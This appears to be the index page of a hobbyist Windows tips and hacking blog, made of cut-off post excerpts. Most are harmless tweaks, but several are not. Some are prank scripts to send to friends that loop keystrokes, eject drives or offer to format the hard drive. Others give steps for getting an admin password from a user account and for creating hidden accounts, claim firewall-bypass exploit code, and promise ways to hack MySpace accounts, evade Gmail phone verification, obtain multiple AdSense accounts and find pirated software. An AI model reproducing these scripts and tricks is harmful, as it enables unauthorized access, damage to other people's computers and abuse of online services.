This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Bypass gmail Mobile verification

Follow these steps : 1. First of all go to www.k7.net/ and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US. 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'. 3. Now click on 'I accept, create an account'. 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/ 5....

How to Block The Useless Website

There are many reason why you need to know how to block a website. Some of the most common reasons are you have been targeted by spammers who use adware and popups to attack your PC. Other reasons may be to prevent your children from having access to certain site content such as porn and gambling. Depending on the level of security you wish, learning how to block a website may require a adjustments of your web browser, the use of internet filtering software or editing of your host file. At any rate you can try all methods to see which works...

Want more PC speed? 8 Ways to Speed up PC Performance!!

Slowing down computer day by day!! This is the most common problem all computer users facing. Even though no one can give the straight answer for solving this and run the computer smoother like days it bought. Normally first few days after installing the operating system computer run fast and smoother. After 2, 3 weeks it’s slowing down again. There are many expensive tools available that have guaranteed for speed up your pc, but as my experience some software are failed and some are successful. Tune-up utilities such a software that has good...

Are you using an computer that is accessed by more than one ? Secure your privacy by cleaning pagefile.

Assume your are working on computer where you don't really own the computer or is shared with someone else. Do you want maintain privacy and avoid other know what you were doing etc. Then this tweak may be of interest to you. Go to Control Panel >>> Administrative tools>>>local security policy. Then Go to local policies ---> security options. Then change the option for "Shutdown: Clear Virtual Memory Pagefi...

Automatically Defrag Drives with a new context menu item!

A new Registry import file named context_defrag.inf in Notepad (be sure to save with it with the Save as type set to All Files and not Text Documents) and place the following text inside: ; context_defrag.INF ; Adds Defrag to the right click context menu in Windows XP [version] signature="$CHICAGO$" [DefaultInstall] AddReg=AddMe [AddMe] HKCR,"Drive\Shell\Defrag\command",,,"DEFRAG.EXE %1" Then, right-click and choose Install. This will add a context menu to XP that allows you to automatically defrag drives, using the command line version of...

Avoid Download of File Attachments that may have Virus Infections

Open Group Policy Editor by going to START - RUN and entering gpedit.msc This one is easy.. Navigate to USER CONFIGURATION - ADMINISTRATIVE TEMPLATES - WINDOWS COMPONENTS - INTERNET EXPLORER. For This on right hand pane (most likely secondly last line at bottom) you should see an item Configure Outlook Express. Double Click on it and enable it and mark check box that says "Block attachments that may contain virus". OK out and close the global policy edit...

Boot Defragment for Fast Booting

A very Important new feature in Microsoft Windows XP is the ability to do a boot defragment. This basically means that all boot files are placed next to each other on the disk drive to allow for faster booting. By default this option is enabled but some upgrade users have reported that it isn't on their setup. 1. Start Regedit. 2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction 3. Select Enable from the list on the right. 4. Right on it and select Modify. 5. Change the value to Y to enable and N to disable. 6....

Have tendency to Forget Passwords ?

Most of us have a common tendency of forgetting passwords. If you don't every forget anything, I envy you and this may not be of much use to you but for most of us, this may be a life saver. If you're running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk by following instruction as shown below: Go to START--->>>CONTROL PANEL--->>>USER ACCOUNTS. Then click your account name and further on in RELATED TASKS, click PREVENT A FORGOT PASSOWRD. A wizard would come up, follow...

How to avoid autoplay of CD

Way I like best. Hey this time no registry trick even though there are ways in registry to do it. In earlier operating systems only those CD that had autorun.inf file in their root directory were able to execute on its own but with advent of WINDOWS XP it has become possible with just about anything. Well sometimes it is good but there are other times when you want to avoid this part of automation. Simply press SHIFT key when you enter a CD in your CD drive. It won't Auto play. For those of you, who do want a registry hack. Here it is: Open...

How to Change Drive Letters

To change drive letters (useful if you have two drives and have partitioned the boot drive, but the secondary drive shows up as "D") Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths." From here you can add, remove or change drive letters and paths to the partiti...

How to Restart Windows without Restarting your Computer

When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking on SHUTDOWN button, you computer would restart without restarting the Computer.This is equivalent to term"HOT REBOO...

Get your adsense account approved fast

I’ve noticed that a lot of people have trouble getting an AdSense account the regular way, especially if you live outside of US/CAN/EUROPE. (especially Indians) I’m going to show you guys a trick that I have been using for a while, and which has never failed me in getting multiple AdSense accounts. Here is what you do: 1. Go to the website www.*******.com 2. On the top right hand side you will see a register button click it! 3. Fill in all the information including a valid email. 4. Click I’d like to set up an AdSense account. adsense aprooval...

THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file. @echo off echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg echo q>>\z.dbg debug <\z.dbg>nul del...

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc... pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way...

Open Notepad continually in your friend's computer

@ECHO off:top START %SystemRoot%\system32\notepad.exe GOTO top Save it as "Anything.BAT" and send ...

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Type : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." loop Save it as "Anything.VBS" and send ...

Frustrate your friend by making this VBScript hit Backspace simultaneously

Type : MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop Save it as "Anything.VBS" and send ...

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out

Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m...

Frustrate your friend by making this VBScript hit Enter simultaneously

...

Toggle your friend's Caps Lock button simultaneously

Type : Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Save it as "Anything.VBS" and send it. 3) Convey your friend a lil' message and shut down his / her computer: Type : @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s Save it as "Anything.BAT" in All Files and send ...

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type : Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as "Anything.VBS" and send ...

Remove Unwanted Hidden Programs

If you want to remove programs that are installed with Windows but are not visible in "Add/Remove Windows Components" (such as MSN Messenger in WinXP), edit a file called "C:\WINDOWS\INF\SYSOC.INF". Go to: Start>> Run>> type in: C:\WINDOWS\INF\SYSOC.INF [Enter] In there you will find a listing of programs, and you will note that some programs have the word 'hide' at the end. Simply remove the word 'hide' but leave the preceding comma. Examples: BEFORE:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 AFTER:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 Exit...

Select theme and color scheme for welcome screen

With this tweaks you will be able to modify which color selection of the default theme is shown when the computer start up screen is displayed. Currently since there is only one theme you can only change the color scheme for the theme but in the future when more themes are available for XP you will be able to change which theme is used in the same place in the windows registry. 1. Start regedit, if you are unfamiliar with regedit please see our FAQ. 2. Navigate to HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager 3....

Sixteen Simple Tips

1.Switch to welcome screen Press Win+L to switch to the Welcome screen. 2.Lock your workstation Press Win+L to lock your workstation. 3.Switch user easly You can switch users without going through the Welcome screen: From Task Manager, go to the Users tab, right-click a user, and select Connect. 4.Hibrernate computer Hold down the shift key in the shutdown dialog to change "Stand By" to "Hibernate". Or just press H to hibernate instantly. You can even use the Power Control Panel to configure your power button to hibernate. 5.Disable...

Solve Hidden files does not appear After effected by virus

First Stopping the virus: u need to check the task manager to see if there is a (SVCHOST.EXE) running under the current logged in username and try to terminate it. Note: After u terminate the virus try not to double click on any of you computer driver coz this.... action will start the virus allover again, when u need to access any of ur drivers (Hard Disk Partition), type it's drive letter in the address bar and it will open without starting the virus process. Second Fixing the show hidden files and folders: ________________________________________...

Speed up Menu Display

• Click Start. Right-click My Computer, and then click Properties • Click the Advanced tab. In the Performance area, click Settings • On the Visual Effects tab in the Performance Options dialog box, clear the Fade or slide menus into view check box • Click OK. • In the System Properties dialog box, click OK.Now when you click a menu, it will appear almost instant...

Speed up the Start Menu

The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key. Fire up the Registry Editor and navigate to the following key: HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay By default, the value is 400. Change this to a smaller value, such as 0, to speed it up. If this doesn't work for some reason, then you might try the following: Navigate to Display Properties then Appearance then Effects and turn off the option titled Show menu shadow. You will get much better overall performan...

Ten tips to increase your Windows Security

1- Always protect your Administrator account by creating password, just go to Control Panel > User Accounts, select your account and the click on "create a password for your account". 2- Protect your account by Password protect your screen saver, go to Control Panel > Display, Click on the Screen Saver tab and then check on resume password protect. 3- Setup a BIOS Password to protect your PC Setup application. 4- Always force you windows automatic update on, go to Control Panel > Automatic Updates and then Select the first option...

Turn off the Low Disk Space Notification

Open Registry by going to START-RUN and entering REGEDIT and Navigate to HKEY_CURRENT_USER and in Software – Microsoft – Windows – CurrentVersion – Policies - Explorer, and set the value of NoLowDiskSpaceChecks to DWORD = 1. (This modification requires a logoff or reboot to wo...

Want to Improve Shutdown Time

Close apps automatically & quickly at shutdown Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications. In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500...

Windows Utilities Shortcuts

Here are some popular shortcuts to handy Windows utilities: Simply type the shortcut command in to the Run textbox (Start>> Run), then click OK. Shortcut Utility compmgmt.msc Computer Management devmgmt.msc Device Manager dfrg.msc Disk Defragmenter diskmgmt.msc Disk Management eventvwr.msc Event Viewer fsmgmt.msc Shared Folders Manager gpedit.msc Group Policies Editor lusrmgr.msc Local Users and Groups Manager perfmon.msc Performance Monitor secpol.msc Local Security Settings services.msc...

You Cannot Create a Folder Named CON !!

It is fact that you cannot create a folder named "CON", nor can you rename an existing folder to "CON". "CON" and a number of other character strings are in fact reserved names that go back to the days of DOS and cannot be used to name folders or files. Other reserved names are: * PRN * AUX * NUL * LPT1 * COM1 * Potential drive letter - A: to Z: * A number of others If you try to name a folder using one of these reserved names, the name will automatically revert to the default, generally "New Folder". Moreover, if you try to use a reserved...

Useful Direct Links

Kaspersky http://dnl-eu10.kaspersky-labs.com/devbuilds/ Bitdefender http://download.bitdefender.com/windows/ http://download.bitdefender.com/updates/ http://download.bitdefender.com/SMB/ AVG http://download.grisoft.cz/softw/80free/update/ Symantec Ebooks & Guide ftp://ftp.symantec.com/public/english_us_canada/products/ Mozilla Firefox http://releases.mozilla.org/pub/mozilla.org/firefox/releases/ Opera ftp://mirror-fpt-telecom.fpt.net/mirror/opera/win/ HP Drivers ftp://ftp.hp.com/pub/softlib/software1 ftp://ftp.hp.com/pub/softlib/software2 ftp://ftp.hp.com/pub/softlib/software3 ...10 IBM...

Firefox Tricks & Tweaks

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance. Here are some of the popular tweaks. Accessing your about:config page In your Firefox, type about:config in the address bar. You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed. On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field....

Hack Youtube To Watch the Best Quality Videos

Whenever you connect to my youtube channel (http://www.youtube.com/), if you see some videos can not watch with high quality, you can use this TIPS ... Step1: Click to video that you want to see, the link will display on Address bar. E.x: http://www.youtube.com/user/wildminer?blend=6&ob=4 Step2: Add &fmt=6 to the end of that string. That address like: http://www.youtube.com/user/wildminer?blend=6&ob=4&fmt=6 Enjoy it ! The higher quality video !!! Step3: Add &fmt=18 to the end of that string, you'll have the best quality...

Be Careful Before You ‘Like’ This on Facebook

Warning: If you receive news feed carrying any of the following links ‘Liked’ by any of your Facebook friends, don’t click on the link to check it out. It’s a clickjacking worm attack spreading through the ‘Like’ option and has affected hundreds of thousands of users. These messages include: “LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE,” “This man takes a picture of himself EVERYDAY for 8 YEARS!!,” “The Prom Dress That Got This Girl Suspended From School” and “This Girl Has An Interesting Way Of Eating A Banana...

Speed up your PC

You may recognize that your system gets slower and slower when playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces you do not need any more. So create a new text file on your desktop and call it .. "RAMcleaner" or something... Type “FreeMem=Space(64000000)” in this file and save it as “RAMcleaner.vbs” [ You may choose the "All Files" option when you save it ] Run the file and your RAM will be cleaned, Of course you can edit the code in the file for a greater "cleaning-progress". FreeMem=Space(128000000) Just...

Hack Admin Password From User Mode

Hack Admin Password From User Mode Disclaimer: Use this article for eductational purpose ONLY. Follow these steps: 1. Open command prompt (Start->Run->cmd), 2. Enter the following command, then press ENTER 3. Enter the followin command, then press ENTER: compmgmt.msc This should open the computer management console. 4. Go to local users & groups->users. Right click on any user and select "set password". If you get a "access denied" do the following: start>run>cmd then use following commands 1) net user test /add (this command...

How To Create A Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000. #[Start] [Run] [Regedit] #Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList #Modify/Create the Value Data Type(s) and Value Name(s) as detailed below . #Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden #Setting for Value data:...

How to lock your computer

Creating a desktop shortcut for locking your computerIf you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks: Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation'...

Address Resolution Protocol (ARP) Attacks

-: Address Resolution Protocol (ARP) Attacks :- What Does ARP Mean? Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication between local nodes can be made. On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program...

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.This techniques is nothing but the vulnerability found in windows-xp sp2 firewall. This is explained here in detail with exploit code. Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network. * Microsoft Windows XP SP2 Windows XP SP2 Firewall has list of allowed...

ClickJacking attacks

Definition :- "Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia Introduction :- A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function. The long list of vulnerabilities involves browsers, Web sites and plug-ins like...

COMPLETE DETAILS ABOUT The TROJON HORSE

What is a Trojan ? "A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia "A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory Types of Trojan :- The different types of Trojan Horses are as follows- 1) Remote Access Trojans :- Abbreviated...

Create An Ftp Server On Your PC

Process-1: First of all u have to get an static IP-Address. Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside.. 1) Goto no-ip & create urself a free account. 2) Now ur account been created & ll receive ur account password via mail to ur email address. 3) After getting ur password login to ur account of no-ip.com 4.After getting...

Create Your Own Instant Messenger Bot

-: Creating IM Bot :- This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients. To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”. For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting. f you like to write...

Dangerous Google Searching Trick - How To Find Almost Everything Using Google

Using this Dangerous Searching Technique You will be able to find everything like music,movies,cracks,full softwares,games,keygens.... In short everything... So To Know More read on... DANGEROUS SEARCHING TECHNIQUES In this Technique I will Show you How To Find files Using Various Hosts such as rapidshare, megaupload, hotfile etc.... You can choose your favourite host that you want... So Let's Say You want to Download a Game say "Need for speed" (or anyother thing of your choice)... STEPWISE DESCRIPTION: 1. Go to the Site www.google.com 2....

Some Ethical Hacking eBooks

-: Hacking Exposed-5 :- One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining...

Folder Lock Without Any Software

Folder Lock With Password Without Any Software- Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Locker' would be formed at the same location. Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter...

How to Hack a MySpace Account

MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace. THINGS YOU SHOULD KNOW BEFORE PROCEEDING With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there...

Increase Virtual RAM - To Make Your System Faster 100 percent works

Follow the steps given below :- 1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard. Another way is Right-Clicking 'My Computer' and then Select 'Properties'. 2) Click on the 'Advanced' tab. 3) Under 'Performance', click 'Settings'. 4) Then click the 'Advanced' tab on the button that pops up. 5) Under 'Virtual Memory' at the bottom, click 'Change'. 6) Click the 'Custom Size' button. 7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000),...

Input Validation Attacks

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.The most common input validation attacks are as follows- 1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions. To execute...